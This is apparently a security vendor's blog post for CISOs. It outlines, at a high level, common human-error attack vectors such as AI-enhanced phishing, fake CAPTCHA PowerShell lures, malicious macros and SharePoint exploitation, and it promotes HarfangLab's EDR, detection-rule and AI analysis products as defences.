Cybersecurity and human error: A survival guide for CISOs

Proofpoint’s “Voice of the CISO 2024” report reveals that three-quarters of CISOs still consider human error to be the main risk to cybersecurity. So how can you respond to an attack vector that boils down to human error? Here’s a look at some common mistakes and what to do in the event of a security incident.

Artificial intelligence

The use of artificial intelligence is growing by the day, and so are the risks to cybersecurity. What are they?

First, AI-powered phishing, smishing, and vishing campaigns allow for ever-greater personalization, more credible messages, and bigger mass mailings. Workspace users must be extra vigilant.

Second, users of generative AI may disclose confidential company information, posing a risk to data security.

Beyond platforms such as ChatGPT, Claude, or Gemini, users may also be tempted to install software or browser extensions that offer generative AI features but are actually infostealers. Fortunately, this type of malware can be detected by cybersecurity solutions such as EDR or EPP. And regarding chat solutions, awareness of the risks remains just as essential.

In addition, AI agents deployed on an information system can perform actions that compromise data security – either by mistake, due to misconfiguration, or through arbitrary code execution.

Finally, it is important for tech teams using AI to remember that the generated code may contain vulnerabilities. It must be reviewed before deployment to ensure the required level of security.

Malicious file upload

Old habits die hard: phishing (and its derivatives) is still going strong. As mentioned earlier, and as our experts point out, AI allows attackers to further personalize phishing, vishing, or smishing messages and send them en masse, as well as quickly process the data gathered through their malicious actions.

As messages become more and more credible, recipients are increasingly likely to fall into the trap and open a fraudulent attachment or link that will infect their workstation.

And that’s not to mention the risks associated with using USB devices containing malicious files.

To address these mounting risks, the cyber toolbox of CISOs and SOC Managers should include:

• Antivirus software to detect malicious files 
• A device control solution to protect endpoints from malicious files contained in external devices, or even prohibiting their use altogether
• An EDR to detect malicious files, scripts, behaviors, and indicators of compromise (IOCs) on the information system

Pro tip

“Rich data and features that facilitate investigations are essential for cyber analysts. HarfangLab provides a correlation engine to group related security events into a single alert to reduce alert fatigue, as well as telemetry specific to Office macros for in-depth investigations in the event of a compromise. These are major assets for faster and more effective investigations.”

Benoit Maïzi, CTI Engineer – HarfangLab 

Fake CAPTCHAs

Attackers can create pages with fake CAPTCHAs to trick users into executing malware – for example, Vidar or Lumma Stealer – which can be used as an access point for cybercrime or ransomware.

From these pages, the user may be prompted to open the command executor to paste a PowerShell command that will trigger the loading of a malicious file, allowing attackers to execute the rest of the steps in their attack, up to the installation of the payload on the endpoint – usually an infostealer.

To protect against this type of cyberattack, beyond raising awareness, EDR behavioral rules can detect the action of the user executing the command, as well as the rest of the execution chain.

Pro tip

“An Active Directory / Entra Domain can include a group configuration that can disable the launch of commands via Windows + R, and thus protect the endpoint against most CAPTCHA attacks.”

Benoit Maïzi, CTI Engineer – HarfangLab

Macros in Office documents

Macros are designed to save time by automating repetitive tasks. But they also pose a risk to the security of a workspace because they can be used to execute malicious code when a document is opened. Attackers can then use them to corrupt or steal data and infiltrate the information system via the corrupted document. Malicious macros can be embedded in legitimate macros, making them difficult to detect.

How can you protect your endpoints? For both proactive and reactive security:

• Antivirus software to automatically detect and block known malicious files before they are downloaded on an endpoint
• Static detection capabilities to identify malicious files present on the information system, either by signatures or by artificial intelligence
• Detection of suspicious behavior in macros and their contents, for example, by a behavioral detection engine
  

Exploiting vulnerabilities in workspace tools

Attackers are constantly looking for vulnerabilities to exploit in operating systems or business applications.

In 2025, for example, SharePoint was at the center of a massive crisis involving the exploitation of vulnerabilities to execute remote code and hijack servers on on-premises instances. 

Vulnerabilities can be detected using Attack Surface Management tools. In cases where the vulnerability is unknown, and while waiting for patches to be released if the vulnerability is known, a high-performance cybersecurity shield is essential to detect suspicious behavior and limit the impact of exploiting these vulnerabilities. In the case of SharePoint, Harfanglab’s EDR detected and blocked the execution of PowerShell processes, preventing the payload from being written to protect against exploitation of the vulnerability.

How HarfangLab can help you in the event of a security incident

The HarfangLab platform offers several major advantages for cyber experts in preventing, identifying, and resolving incidents by limiting the impact of attackers on a workstation.

As we have seen, the Attack Surface Management tool can detect not only vulnerabilities but also Shadow IT; EPP can proactively block known threats with its antivirus, firewall, and USB port control tool; and we will see in detail how the EDR can respond to threats.

Fine-grained detection with transparent, accessible, customizable rules

HarfangLab integrates generic YARA and Sigma rules designed to detect malicious files and behaviors, with the ability to customize them according to the specific needs of the workspace: who should have access to what, which network connections are legitimate or not, which endpoints or groups of endpoints are authorized or not to connect to the Internet or a given IP address, to download files, to contain certain software, etc.

In addition, the platform is accessible via API and all data can be exported for in-depth investigation, while choosing the environment in which to exploit the data.

Finally, this open and transparent access to 100% of the platform and data (configuration, detection rules, and telemetry) facilitates effective and rapid investigations following an alert, and allows weak signals to be identified so that a timely response can be planned in the event of a security incident. It also promotes seamless and smooth integration into an existing cyber ecosystem.

Artificial intelligence to detect unknown threats and speed up investigations and remediation

HarfangLab integrates an AI-based engine, Ashley, to detect unknown threats, including suspicious behavior that may turn out to be malicious – even before indicators of compromise or vulnerabilities are published.

AI remains at the heart of the remediation process with the LLM assistant Kio. Analysts can search for information in the platform’s documentation and request detailed analyses of incidents in natural language. 

See HarfangLab in action